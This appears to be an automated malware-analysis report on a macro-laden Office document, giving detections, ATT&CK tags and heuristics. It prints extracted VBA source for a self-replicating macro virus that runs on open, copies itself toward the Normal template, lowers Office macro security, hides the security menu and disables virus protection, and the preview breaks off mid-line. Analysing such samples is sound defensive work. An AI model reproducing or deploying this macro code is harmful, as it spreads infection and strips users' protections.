Verdict: MALICIOUS (Risk Score 320)
Malware Insights
MITRE ATT&CK
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
- T1204.002 Malicious File
The sample contains obfuscated VBA macros designed to execute upon opening the document, as indicated by the 'Document_Open' macro and 'CreateObject' calls. The macro attempts to modify registry keys related to the registered owner and Office security level. The presence of 'Win.Trojan.Psycho-3' and 'Win.Worm.VBS-213' detections strongly suggests malicious intent, likely to download and execute a secondary payload.
Heuristics (6)
- ClamAV: Win.Trojan.Psycho-3 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Win.Trojan.Psycho-3
- VBA macros detected (medium, OLE_VBA_MACROS, 4 related findings): Document contains VBA macro code
- Obfuscated auto-exec VBA loader (critical, OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER): Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
- Document_Open macro (high, OLE_VBA_DOCOPEN): Document_Open macro
- CreateObject call (high, OLE_VBA_CREATEOBJ): CreateObject call
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 10388 bytes |

SHA-256: d842314a0df7346fcecbd392fb9d28b3b358039c7149709b2fb5779f79ba9c40
Detection (ClamAV): Win.Worm.VBS-213
Obfuscation or payload: unlikely
Preview script: first 1,000 lines of the extracted script

```vba
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
    On Error Resume Next
    ActiveDocument.VBProject.VBComponents.Item(1).Name = NormalTemplate.VBProject.VBComponents.Item(1).Name
    nt = NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.CountOfLines
    ad = ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.CountOfLines
    System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion", "RegisteredOwner") = "--··-«([BencH])»-··--"
    System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
    If Application.Version = 9# Then
        CommandBars("Macro").Controls("Security...").Visible = False
    End If
    If Application.Version = 8# Then
        Options.ConfirmConversions = False: Options.VirusProtection = False: Application.EnableCancelKey = wdCancelDisabled
        CommandBars("Bench").Visible = True
    End If
    If Day(Now) = 17 And Month(Now) = 11 Then
        With Assistant.NewBalloon
            .Icon = msoIconAlert
            .Heading = Chr(91) + Chr(66) + Chr(101) + Chr(110) + Chr(99) + Chr(104) + Chr(93) + Chr(32) + Chr(77) + Chr(97) + Chr(99) + Chr(114) + Chr(111) + Chr(32) + Chr(86) + Chr(105) + Chr(114) + Chr(117) + Chr(115) + Chr(32) + Chr(40) + Chr(69) + Chr(41)
            .Text = Chr(73) + Chr(116) + Chr(39) + Chr(115) + Chr(32) + Chr(109) + Chr(121) + Chr(32) + Chr(97) + Chr(117) + Chr(116) + Chr(104) + Chr(111) + Chr(114) + Chr(39) + Chr(115) + Chr(32) + Chr(98) + Chr(105) + Chr(114) + Chr(116) + Chr(104) + Chr(100) + Chr(97) + Chr(121) + Chr(32) + Chr(116) + Chr(111) + Chr(100) + Chr(97) + Chr(121) + Chr(33) + Chr(33) + Chr(33) + Chr(32) + Chr(76) + Chr(101) + Chr(116) + Chr(39) + Chr(115) + Chr(32) + Chr(97) + Chr(108) + Chr(108) + Chr(32) + Chr(99) + Chr(101) + Chr(108) + Chr(101) + Chr(98) + Chr(114) + Chr(97) + Chr(116) + Chr(101) + Chr(33) + Chr(33) + Chr(33)
            .Animation = msoAnimationGetAttentionMajor
            .Show
        End With
        ActiveDocument.Content.Font.Animation = wdAnimationSparkleText
    End If
    If Day(Now) = Minute(Now) Then
        Application.Caption = Chr(40) + Chr(91) + Chr(66) + Chr(93) + Chr(77) + Chr(86) + Chr(41) + Chr(32) + Chr(77) + Chr(105) + Chr(99) + Chr(114) + Chr(111) + Chr(115) + Chr(111) + Chr(102) + Chr(116) + Chr(32) + Chr(87) + Chr(111) + Chr(114) + Chr(100)
        Application.StatusBar = Chr(89) + Chr(111) + Chr(117) + Chr(32) + Chr(119) + Chr(101) + Chr(114) + Chr(101) + Chr(32) + Chr(105) + Chr(110) + Chr(102) + Chr(101) + Chr(99) + Chr(116) + Chr(101) + Chr(100) + Chr(32) + Chr(119) + Chr(105) + Chr(116) + Chr(104) + Chr(32) + Chr(116) + Chr(104) + Chr(101) + Chr(32) + Chr(91) + Chr(66) + Chr(101) + Chr(110) + Chr(99) + Chr(104) + Chr(93) + Chr(32) + Chr(77) + Chr(97) + Chr(99) + Chr(114) + Chr(111) + Chr(32) + Chr(86) + Chr(105) + Chr(114) + Chr(117) + Chr(115)
        ActiveDocument.Content.Font.Animation = wdAnimationShimmer
    End If
    If Month(Now) = 4 And Day(Now) = 19 Then
        Application.StatusBar = Chr(73) + Chr(110) + Chr(102) + Chr(101) + Chr(99) + Chr(116) + Chr(101) + Chr(100) + Chr(32) + Chr(119) + Chr(105) + Chr(116) + Chr(104) + Chr(32) + Chr(91) + Chr(66) + Chr(101) + Chr(110) + Chr(99) + Chr(104) + Chr(93) + Chr(32) + Chr(77) + Chr(97) + Chr(99) + Chr(114) + Chr(111) + Chr(32) + Chr(86) + Chr(105) + Chr(114) + Chr(117) + Chr(115) + Chr(46) + Chr(46) + Chr(46) + Chr(32) + Chr(45) + Chr(32) + Chr(91) + Chr(66) + Chr(101) + Chr(110) + Chr(99) + Chr(104) + Chr(93)
        ActiveDocument.Content.Font.Animation = wdAnimationSparkleText
    End If
    If Month(Now) = 5 And Day(Now) = 1 Then
        Application.Caption = Chr(65) + Chr(110) + Chr(110) + Chr(105) + Chr(118) + Chr(101) + Chr(114) + Chr(115) + Chr(97) + Chr(114) + Chr(121)
        Application.StatusBar = Chr(68) + Chr(101) + Chr(97) + Chr(114) + Chr(101) + Chr(115) + Chr(116) + Chr(32) + Chr(68) + Chr(105) + Chr(110) + Chr(97) + Chr(104) + Chr(46) + Chr(32) + Chr(89) + Chr(111) + Chr(117) + Chr(32) + Chr(119) + Chr(105
```

... (truncated)